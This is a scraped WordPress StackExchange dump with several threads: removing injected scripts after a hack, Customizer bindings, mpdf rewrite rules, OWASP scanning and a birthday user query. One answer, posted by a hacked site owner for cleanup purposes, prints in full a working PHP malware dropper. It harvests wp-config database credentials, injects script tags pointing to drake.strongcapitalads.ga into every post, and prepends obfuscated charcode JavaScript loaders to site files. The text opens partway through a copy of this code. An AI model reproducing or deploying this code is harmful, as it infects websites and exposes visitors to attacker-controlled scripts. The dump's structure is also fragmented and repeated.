$dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n @search_file_js( $dir,$file_to_search);\n return;\n }\n} else {\n\nforeach($files as $key => $value){\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n \n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {\nglobal $count;\n$count++;\n make_it_js($path);\n\n } }else if($value != "." && $value != "..") {\n\n search_file_js($path, $file_to_search);\n\n } \n } \n }\n\n}\n\nfunction make_it_js($f){\n $g = file_get_contents($f);\n \n \n\nif (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {\n\n} else {\n\n$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";\n$g = file_get_contents($f);\n$g = $l2.$g;\n@system('chmod 777 '.$f);\n@file_put_contents($f,$g);\n\n}\n\n \n}\nfunction make_it_index($f){\n$g = file_get_contents($f);\nif (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false || strpos($g, 'drake.strongcapitalads.ga') !== false) {\n\n} else {\n$l2 = "<script type='text/javascript' src='https://drake.strongcapitalads.ga/m.js?n=nb5'></script>";\n$g = file_get_contents($f);\n$g = $l2.$g;\n\n@system('chmod 777 '.$f);\n@file_put_contents($f,$g);\necho "in:".$f."\\r\\n";\n\n\n }\n}\n\nfunction make_it($f){\n$g = file_get_contents($f);\nif (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {\n\n} else {\n$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";\nif (strpos($g, '<head>') !== false) {\n$b = str_replace("<head>","<head>".$l2,$g);\n@system('chmod 777 '.$f);\n@file_put_contents($f,$b);\necho "hh:".$f."\\r\\n";\n}\nif (strpos($g, '</head>') !== false) {\n$b = str_replace("</head>",$l2."</head>",$g);\n@system('chmod 777 '.$f);\n@file_put_contents($f,$b);\necho "hh:".$f."\\r\\n";\n}\n\n\n }\n}\n</code></pre>\n"
}
] | 2020/11/06 | [
"https://wordpress.stackexchange.com/questions/377752",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197148/"
] | My Wordpress site has been hacked and every post has had
`<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>`
added to the end of each post which I need to remove. I have 375 posts I need this removing from I have tried
`UPDATE wp_posts SET post_content = REPLACE (post_content, '<p style="text-align: center;"><img src="http://i.imgur.com/picture.jpg" alt="" /></p>', '');`
from the [How to mass delete one line from all posts](https://wordpress.stackexchange.com/questions/188384/how-to-mass-delete-one-line-from-all-posts)
and substituted it with the following query I'm thinking it has something to do with the ' in the query
`UPDATE wp_posts SET post_content = REPLACE (post_content, '<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>', '');`
but I get the following error
`#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>'' at line 1`
when I run the query I think it has something to do with the `'` inside the script tags but I don't know how to remove them. | Try this:
```
UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>","");
``` |
377,848 | <p>I tried several plugins posted by Weston Ruter for jQuery created controls for the WP Customizer. They work but are different from those created via PHP.
For example, controls created with PHP (<code>customizer.php</code>) respond normally to code in <code>customize-controls.js</code> or in <code>customize-previews.js</code>:</p>
<pre class="lang-js prettyprint-override"><code>api( 'tzkmx_test_control', function( value ){
value.bind( function( to ) {
var answer = to;
});
});
</code></pre>
<p>Controls created with jQuery do not respond to binding!
Does anyone know how <strong>to bind</strong> them?</p>
| [
{
"answer_id": 377775,
"author": "uPrompt",
"author_id": 155077,
"author_profile": "https://wordpress.stackexchange.com/users/155077",
"pm_score": 4,
"selected": true,
"text": "<p>Try this:</p>\n<pre><code>UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>","");\n</code></pre>\n"
},
{
"answer_id": 377781,
"author": "Rick Hellewell",
"author_id": 29416,
"author_profile": "https://wordpress.stackexchange.com/users/29416",
"pm_score": 0,
"selected": false,
"text": "<p>Your original code had single quotes inside a single quote. Which is why @uprompt 's code worked. .... he uses a double quote to surround the text to search for in the command.</p>\n"
},
{
"answer_id": 377953,
"author": "TheRealThor",
"author_id": 197334,
"author_profile": "https://wordpress.stackexchange.com/users/197334",
"pm_score": 0,
"selected": false,
"text": "<p>I was hacked with the same script, just the URL is different.</p>\n<pre><code><script src="https://drake.strongcapitalads.ga/m.js?n=ns1" type="text/javascript2></script> \n</code></pre>\n<p>Seems this group has various server under their control. I already sent out abuse emails.</p>\n<p>Don't forget that the malware was also added to all your *.js files and other files. Here is the malicious script that was uploaded to my server making those chances to the posts and other files:</p>\n<pre><code><?php echo "ssqqss>>>";\nerror_reporting(0);\nini_set('display_errors',0);\nini_set('max_execution_time', '300');\nini_set('memory_limit', '-1');\n$count = 0;\n\nsearch_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");\necho "\\r\\n\njssss count:: ". $count;\necho "<<<<ssqqss";\n\n \nfunction get_var_reg($pat,$text) {\n \n if ($c = preg_match_all ("/".$pat."/is", $text, $matches))\n {\n return $matches[1][0];\n }\n \n return "";\n}\nfunction search_file_ms($dir,$file_to_search){\n\n$search_array = array();\n\n$files = scandir($dir);\n\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n @search_file_ms( $dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n @search_file_ms( $dir,$file_to_search);\n return;\n }\n}\n\nforeach($files as $key => $value){\n\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n\n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false) {\n \n show_sitenames($path);\n \n \n \n }\n\n } else if($value != "." && $value != "..") {\n\n @search_file_ms($path, $file_to_search);\n\n } \n } \n}\nfunction show_sitenames($file){\n $content = @file_get_contents($file);\n if(strpos($content, "DB_NAME") !== false) {\n \n \n $db = get_var_reg("'DB_NAME'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n $host = get_var_reg("'DB_HOST'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n $user = get_var_reg("'DB_USER'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\\"](.*?)['|\\"]",$content);\n\n\n// Create connection\n$conn = new mysqli($host, $user, $pass);\n\n// Check connection\nif ($conn->connect_error) {\n \n} else { \n\n\n$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";\n$result = $conn->query($q);\nif ($result->num_rows > 0) {\n while($row = $result->fetch_assoc()) {\n $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";\n $result2 = $conn->query($q2);\n if ($result2->num_rows > 0) {\n while($row2 = $result2->fetch_assoc()) {\n $val = $row2['post_content'];\n if(strpos($val, "drake.strongcapitalads.ga") === false){\n if(strpos($val, "drake.strongcapitalads.ga") === false){\n \n \n $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\\"<script src='https://drake.strongcapitalads.ga/m.js?n=ns1' type='text/javascript'></script>\\") WHERE post_content NOT LIKE '%drake.strongcapitalads.ga%'";\n $conn->query($q3);\n echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];\n \n } else {\n \n }\n\n } \n }\n } else {\n }\n }\n} else {\n}\n$conn->close();\n}\n}\n}\n\nfunction search_file($dir,$file_to_search){\n\n$files = @scandir($dir);\n\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n @search_file( $dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n @search_file( $dir,$file_to_search);\n return;\n }\n}\n\nforeach($files as $key => $value){\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n \n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {\n\n make_it($path);\n\n } }else if($value != "." && $value != "..") {\n\n search_file($path, $file_to_search);\n\n } \n } \n\n}\n\nfunction search_file_index($dir,$file_to_search){\n\n$files = @scandir($dir);\n\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n search_file_index( $dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n search_file_index( $dir,$file_to_search);\n return;\n }\n}\n\nforeach($files as $key => $value){\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n \n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {\n\n make_it_index($path);\n\n } }else if($value != "." && $value != "..") {\n\n search_file_index($path, $file_to_search);\n\n } \n } \n\n}\nfunction search_file_js($dir,$file_to_search){\n\n$files = @scandir($dir);\nif($files == false) {\n \n $dir = substr($dir, 0, -3);\n if (strpos($dir, '../') !== false) {\n \n @search_file_js( $dir,$file_to_search);\n return;\n }\n if($dir == $_SERVER['DOCUMENT_ROOT']."/") {\n \n @search_file_js( $dir,$file_to_search);\n return;\n }\n} else {\n\nforeach($files as $key => $value){\n\n $path = realpath($dir.DIRECTORY_SEPARATOR.$value);\n \n if(!is_dir($path)) {\n if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {\nglobal $count;\n$count++;\n make_it_js($path);\n\n } }else if($value != "." && $value != "..") {\n\n search_file_js($path, $file_to_search);\n\n } \n } \n }\n\n}\n\nfunction make_it_js($f){\n $g = file_get_contents($f);\n \n \n\nif (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {\n\n} else {\n\n$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";\n$g = file_get_contents($f);\n$g = $l2.$g;\n@system('chmod 777 '.$f);\n@file_put_contents($f,$g);\n\n}\n\n \n}\nfunction make_it_index($f){\n$g = file_get_contents($f);\nif (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false || strpos($g, 'drake.strongcapitalads.ga') !== false) {\n\n} else {\n$l2 = "<script type='text/javascript' src='https://drake.strongcapitalads.ga/m.js?n=nb5'></script>";\n$g = file_get_contents($f);\n$g = $l2.$g;\n\n@system('chmod 777 '.$f);\n@file_put_contents($f,$g);\necho "in:".$f."\\r\\n";\n\n\n }\n}\n\nfunction make_it($f){\n$g = file_get_contents($f);\nif (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {\n\n} else {\n$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";\nif (strpos($g, '<head>') !== false) {\n$b = str_replace("<head>","<head>".$l2,$g);\n@system('chmod 777 '.$f);\n@file_put_contents($f,$b);\necho "hh:".$f."\\r\\n";\n}\nif (strpos($g, '</head>') !== false) {\n$b = str_replace("</head>",$l2."</head>",$g);\n@system('chmod 777 '.$f);\n@file_put_contents($f,$b);\necho "hh:".$f."\\r\\n";\n}\n\n\n }\n}\n</code></pre>\n"
}
] | 2020/11/09 | [
"https://wordpress.stackexchange.com/questions/377848",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/197244/"
] | I tried several plugins posted by Weston Ruter for jQuery created controls for the WP Customizer. They work but are different from those created via PHP.
For example, controls created with PHP (`customizer.php`) respond normally to code in `customize-controls.js` or in `customize-previews.js`:
```js
api( 'tzkmx_test_control', function( value ){
value.bind( function( to ) {
var answer = to;
});
});
```
Controls created with jQuery do not respond to binding!
Does anyone know how **to bind** them? | Try this:
```
UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>","");
``` |
377,910 | <p>I'm saving some pdfs into a folder with mpdf, the urls of pdfs are like this:</p>
<pre><code>https://example.com/wp-content/themes/mysitetheme/invoices/invoice_8937.pdf
</code></pre>
<p>I want that if someone open this url it will show a shorter version like this:</p>
<pre><code>https://example.com/invoice_8937.pdf
</code></pre>
<p>how can I obtain this result using add_rewrite_rule() and apache web server?</p>
<p><strong>UPDATE</strong>
as suggested I changed the code that generates pdfs in a way that are not stored in a local folder, but are generated everytime when visiting the url with a specified id parameter like this</p>
<pre><code>https://example.com/wp-content/themes/mysitetheme/includes/mpdf/invoice?id=8937.pdf
</code></pre>
<p>so now the correct rewrite rule is</p>
<pre><code>/**
* Rewrite rules
*/
add_action( 'init', function() {
add_rewrite_rule( '^example.com/invoice_([0-9]+).pdf$', '/wp-content/themes/mysitetheme/includes/mpdf/invoice.php?id=$1', 'top' );
} );
</code></pre>
| [
{
"answer_id": 377912,
"author": "silvered.dragon",
"author_id": 152290,
"author_profile": "https://wordpress.stackexchange.com/users/152290",
"pm_score": 2,
"selected": true,
"text": "<p>ok it was easy, the problem was that to match the left side pattern you have to use $1 not $matches[1], this is the solution</p>\n<pre><code>/**\n * Rewrite rules\n */\nadd_action( 'init', function() {\n add_rewrite_rule( '^invoice_([0-9]+).pdf$', '/wp-content/themes/mysitetheme/invoices/invoice_$1.pdf', 'top' );\n} );\n</code></pre>\n<p><strong>UPDATE</strong></p>\n<p>From the suggestions received in the comments, it is now clear to me that it is not convenient to use rewrite rules for pages inserted in the wordpress folder without being part of the wordpress core itself, so the suitable solution is to generate virtual pages through the use of add_query_var and include a virtual template to be called when this new query variable is requested through index.php. So the correct code is this:</p>\n<pre><code>// Here I define my new query var and the related rewrite rules \nadd_action( 'init', 'virtual_pages_rewrite', 99 );\n function virtual_pages_rewrite() {\n global $wp;\n $wp->add_query_var( 'invoice' );\n add_rewrite_rule( '^invoice_([0-9]+).pdf$', 'index.php?invoice=$matches[1]', 'top' );\n }\n\n // This part is just to prevent slashes at the end of the url\n add_filter( 'redirect_canonical', 'virtual_pages_prevent_slash' );\n function virtual_pages_prevent_slash( $redirect ) {\n if ( get_query_var( 'invoice' ) ) {\n return false;\n } return $redirect;\n }\n // Here I call my content when the new query var is called\n add_action( 'template_include', 'virtual_pages_content');\n function virtual_pages_content( $template ) {\n $fattura = get_query_var( 'fattura' );\n if ( !empty( $fattura) ) {\n include get_template_directory().'/includes/mpdf/invoice.php';\n die;\n }\n return $template;\n }\n</code></pre>\n"
},
{
"answer_id": 377941,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 0,
"selected": false,
"text": "<p><strong>WP rewrite rules are not for mapping URLs on to arbitrary files and paths.</strong></p>\n<p>To do this, you will need either a HTAccess rule, or Nginx config rules. WordPress rewrite rules are not intended for this.</p>\n<p>Originally, WP permalinks took the form <code>example.com/index.php?post=123</code>, but then pretty permalinks were added, they took pretty URLs such as <code>/post/123</code> and matched them to ugly permalinks <code>index.php?post=123</code>. This is the purpose of WP rewrite rules, to turn pretty URLs into ugly URLs with query variables that get passed to <code>WP_Query</code> to create the main post loop and figure out which template to load.</p>\n<p>A WP rewrite rule consists of:</p>\n<ul>\n<li>A regular expression that matches a URL</li>\n<li>the query variables that expression extracted in the form <code>index.php?var=value</code></li>\n</ul>\n<p>You cannot pass arbitrary files and folders to as the second parameter when adding a rewrite rule. It is not a generic rewrite system. For that you want Apache's <code>mod_rewrite</code>.</p>\n<p>Additionally, it is very bad practice to make direct requests to PHP files in WordPress themes, and a big security risk. WP is a CMS let WP handle the request and hook in to handle it in your plugin/theme.</p>\n<p>Alternatively, add a new query var named <code>mpdf</code>, look for it on <code>init</code>, then load your MPDF script in PHP rather than doing it directly via a browser request. This would let you use WP rewrite rules.</p>\n"
}
] | 2020/11/09 | [
"https://wordpress.stackexchange.com/questions/377910",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/152290/"
] | I'm saving some pdfs into a folder with mpdf, the urls of pdfs are like this:
```
https://example.com/wp-content/themes/mysitetheme/invoices/invoice_8937.pdf
```
I want that if someone open this url it will show a shorter version like this:
```
https://example.com/invoice_8937.pdf
```
how can I obtain this result using add\_rewrite\_rule() and apache web server?
**UPDATE**
as suggested I changed the code that generates pdfs in a way that are not stored in a local folder, but are generated everytime when visiting the url with a specified id parameter like this
```
https://example.com/wp-content/themes/mysitetheme/includes/mpdf/invoice?id=8937.pdf
```
so now the correct rewrite rule is
```
/**
* Rewrite rules
*/
add_action( 'init', function() {
add_rewrite_rule( '^example.com/invoice_([0-9]+).pdf$', '/wp-content/themes/mysitetheme/includes/mpdf/invoice.php?id=$1', 'top' );
} );
``` | ok it was easy, the problem was that to match the left side pattern you have to use $1 not $matches[1], this is the solution
```
/**
* Rewrite rules
*/
add_action( 'init', function() {
add_rewrite_rule( '^invoice_([0-9]+).pdf$', '/wp-content/themes/mysitetheme/invoices/invoice_$1.pdf', 'top' );
} );
```
**UPDATE**
From the suggestions received in the comments, it is now clear to me that it is not convenient to use rewrite rules for pages inserted in the wordpress folder without being part of the wordpress core itself, so the suitable solution is to generate virtual pages through the use of add\_query\_var and include a virtual template to be called when this new query variable is requested through index.php. So the correct code is this:
```
// Here I define my new query var and the related rewrite rules
add_action( 'init', 'virtual_pages_rewrite', 99 );
function virtual_pages_rewrite() {
global $wp;
$wp->add_query_var( 'invoice' );
add_rewrite_rule( '^invoice_([0-9]+).pdf$', 'index.php?invoice=$matches[1]', 'top' );
}
// This part is just to prevent slashes at the end of the url
add_filter( 'redirect_canonical', 'virtual_pages_prevent_slash' );
function virtual_pages_prevent_slash( $redirect ) {
if ( get_query_var( 'invoice' ) ) {
return false;
} return $redirect;
}
// Here I call my content when the new query var is called
add_action( 'template_include', 'virtual_pages_content');
function virtual_pages_content( $template ) {
$fattura = get_query_var( 'fattura' );
if ( !empty( $fattura) ) {
include get_template_directory().'/includes/mpdf/invoice.php';
die;
}
return $template;
}
``` |
377,920 | <p>I have just made a WordPress plugin and I would like to scan it for <a href="https://owasp.org/www-project-top-ten/" rel="nofollow noreferrer">OWASP Top 10</a> vulnerabilities, any resources on how to get started here?</p>
<p>Thanks</p>
| [
{
"answer_id": 377912,
"author": "silvered.dragon",
"author_id": 152290,
"author_profile": "https://wordpress.stackexchange.com/users/152290",
"pm_score": 2,
"selected": true,
"text": "<p>ok it was easy, the problem was that to match the left side pattern you have to use $1 not $matches[1], this is the solution</p>\n<pre><code>/**\n * Rewrite rules\n */\nadd_action( 'init', function() {\n add_rewrite_rule( '^invoice_([0-9]+).pdf$', '/wp-content/themes/mysitetheme/invoices/invoice_$1.pdf', 'top' );\n} );\n</code></pre>\n<p><strong>UPDATE</strong></p>\n<p>From the suggestions received in the comments, it is now clear to me that it is not convenient to use rewrite rules for pages inserted in the wordpress folder without being part of the wordpress core itself, so the suitable solution is to generate virtual pages through the use of add_query_var and include a virtual template to be called when this new query variable is requested through index.php. So the correct code is this:</p>\n<pre><code>// Here I define my new query var and the related rewrite rules \nadd_action( 'init', 'virtual_pages_rewrite', 99 );\n function virtual_pages_rewrite() {\n global $wp;\n $wp->add_query_var( 'invoice' );\n add_rewrite_rule( '^invoice_([0-9]+).pdf$', 'index.php?invoice=$matches[1]', 'top' );\n }\n\n // This part is just to prevent slashes at the end of the url\n add_filter( 'redirect_canonical', 'virtual_pages_prevent_slash' );\n function virtual_pages_prevent_slash( $redirect ) {\n if ( get_query_var( 'invoice' ) ) {\n return false;\n } return $redirect;\n }\n // Here I call my content when the new query var is called\n add_action( 'template_include', 'virtual_pages_content');\n function virtual_pages_content( $template ) {\n $fattura = get_query_var( 'fattura' );\n if ( !empty( $fattura) ) {\n include get_template_directory().'/includes/mpdf/invoice.php';\n die;\n }\n return $template;\n }\n</code></pre>\n"
},
{
"answer_id": 377941,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 0,
"selected": false,
"text": "<p><strong>WP rewrite rules are not for mapping URLs on to arbitrary files and paths.</strong></p>\n<p>To do this, you will need either a HTAccess rule, or Nginx config rules. WordPress rewrite rules are not intended for this.</p>\n<p>Originally, WP permalinks took the form <code>example.com/index.php?post=123</code>, but then pretty permalinks were added, they took pretty URLs such as <code>/post/123</code> and matched them to ugly permalinks <code>index.php?post=123</code>. This is the purpose of WP rewrite rules, to turn pretty URLs into ugly URLs with query variables that get passed to <code>WP_Query</code> to create the main post loop and figure out which template to load.</p>\n<p>A WP rewrite rule consists of:</p>\n<ul>\n<li>A regular expression that matches a URL</li>\n<li>the query variables that expression extracted in the form <code>index.php?var=value</code></li>\n</ul>\n<p>You cannot pass arbitrary files and folders to as the second parameter when adding a rewrite rule. It is not a generic rewrite system. For that you want Apache's <code>mod_rewrite</code>.</p>\n<p>Additionally, it is very bad practice to make direct requests to PHP files in WordPress themes, and a big security risk. WP is a CMS let WP handle the request and hook in to handle it in your plugin/theme.</p>\n<p>Alternatively, add a new query var named <code>mpdf</code>, look for it on <code>init</code>, then load your MPDF script in PHP rather than doing it directly via a browser request. This would let you use WP rewrite rules.</p>\n"
}
] | 2020/11/10 | [
"https://wordpress.stackexchange.com/questions/377920",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/26393/"
] | I have just made a WordPress plugin and I would like to scan it for [OWASP Top 10](https://owasp.org/www-project-top-ten/) vulnerabilities, any resources on how to get started here?
Thanks | ok it was easy, the problem was that to match the left side pattern you have to use $1 not $matches[1], this is the solution
```
/**
* Rewrite rules
*/
add_action( 'init', function() {
add_rewrite_rule( '^invoice_([0-9]+).pdf$', '/wp-content/themes/mysitetheme/invoices/invoice_$1.pdf', 'top' );
} );
```
**UPDATE**
From the suggestions received in the comments, it is now clear to me that it is not convenient to use rewrite rules for pages inserted in the wordpress folder without being part of the wordpress core itself, so the suitable solution is to generate virtual pages through the use of add\_query\_var and include a virtual template to be called when this new query variable is requested through index.php. So the correct code is this:
```
// Here I define my new query var and the related rewrite rules
add_action( 'init', 'virtual_pages_rewrite', 99 );
function virtual_pages_rewrite() {
global $wp;
$wp->add_query_var( 'invoice' );
add_rewrite_rule( '^invoice_([0-9]+).pdf$', 'index.php?invoice=$matches[1]', 'top' );
}
// This part is just to prevent slashes at the end of the url
add_filter( 'redirect_canonical', 'virtual_pages_prevent_slash' );
function virtual_pages_prevent_slash( $redirect ) {
if ( get_query_var( 'invoice' ) ) {
return false;
} return $redirect;
}
// Here I call my content when the new query var is called
add_action( 'template_include', 'virtual_pages_content');
function virtual_pages_content( $template ) {
$fattura = get_query_var( 'fattura' );
if ( !empty( $fattura) ) {
include get_template_directory().'/includes/mpdf/invoice.php';
die;
}
return $template;
}
``` |
377,955 | <p>I have an ACF field 'date_of_birth' which stores the user's birthday, examples: 20201226, 20151225, 19980701</p>
<p><strong>Goal</strong>: get all users which have their birthday this month, or next month.</p>
<p>I currently have this:</p>
<pre><code> $users_start_date_boundary = gmdate( 'Ymd', strtotime( '-1 month' ) );
$users_end_date_boundary = gmdate( 'Ymd', strtotime( '+2 month' ) );
$wp_user_query = new WP_User_Query(
[
'fields' => 'all_with_meta',
'orderby' => 'date_of_birth',
'order' => 'ASC',
'meta_query' => [
[
'key' => 'date_of_birth',
'value' => [ $users_start_date_boundary, $users_end_date_boundary ],
'compare' => 'BETWEEN',
'type' => 'DATE',
],
],
]
);
return $wp_user_query->get_results();
</code></pre>
<p>The problem with this however, that it only gets users with a birthyear of 2020.</p>
<p>How do I get all users, based on the given month boundaries, while ignoring the year/day the person is born in?</p>
| [
{
"answer_id": 377956,
"author": "kero",
"author_id": 108180,
"author_profile": "https://wordpress.stackexchange.com/users/108180",
"pm_score": 0,
"selected": false,
"text": "<p>I believe since ACF stores the values as <code>Ymd</code> you have to write some kind of workaround. One possible solution could be that you hook into saving the field and additionally store the month in another meta field. This would allow to query for <code>=></code> and <code><=</code> with the meta query.</p>\n<p>Another solution is to not store the date in an arbitrary format but one that the database understands and then using the database's existing functions.</p>\n<pre><code>\\add_filter('acf/update_value/type=date_picker', function($value) {\n if (empty($value)) {\n return $value;\n }\n\n $dt = \\DateTime::createFromFormat('Ymd', $value);\n return $dt->format(\\DateTime::ATOM);\n});\n\n\\add_filter('acf/load_value/type=date_picker', function($value) {\n if (empty($value)) {\n return $value;\n }\n\n $dt = new \\DateTime($value);\n return $dt->format('Ymd');\n});\n</code></pre>\n<p>These two filters will change any date picker to store the date in a well formed date string (like <code>2005-08-15T15:52:01+00:00</code>) which can easily be understood by the database. You can also just target this specific field, read more about it (<a href=\"https://www.advancedcustomfields.com/resources/acf-update_value/\" rel=\"nofollow noreferrer\">doc for <code>acf/update_value</code></a> and <a href=\"https://www.advancedcustomfields.com/resources/acf-load_value/\" rel=\"nofollow noreferrer\">doc for <code>acf/load_value</code></a>). (<strong>Attention!</strong> If you already have dates saved in the db, you should manually transform them to new format before applying this code change!)</p>\n<p>To retrieve the user IDs you can use <a href=\"https://developer.wordpress.org/reference/classes/wpdb/\" rel=\"nofollow noreferrer\"><code>$wpdb</code></a> with a custom query like so</p>\n<pre><code>$month = date('m');\n$userIds = $wpdb->get_col($wpdb->prepare(\n "SELECT user_id FROM {$wpdb->usermeta} WHERE meta_key = %s AND (MONTH(meta_value) = %d OR MONTH(meta_value) = %d)",\n 'date_of_birth',\n $month,\n ($month % 12) + 1\n));\n</code></pre>\n<p>(<code>($month % 12) + 1</code> will get the next month, see <a href=\"https://maurobringolf.ch/2017/12/bug-report-compute-the-5-next-months-with-modulo-arithmetic/\" rel=\"nofollow noreferrer\">this explanation</a>)</p>\n<p>It seems that <code>WP_User_Query</code> is not able to retrieve a list of users by their ID, so you would need to call <a href=\"https://developer.wordpress.org/reference/functions/get_userdata/\" rel=\"nofollow noreferrer\"><code>get_userdata()</code></a> for each user ID, which is probably not optimal - but that depends on your use case.</p>\n"
},
{
"answer_id": 377967,
"author": "Ivan Shatsky",
"author_id": 124579,
"author_profile": "https://wordpress.stackexchange.com/users/124579",
"pm_score": 1,
"selected": false,
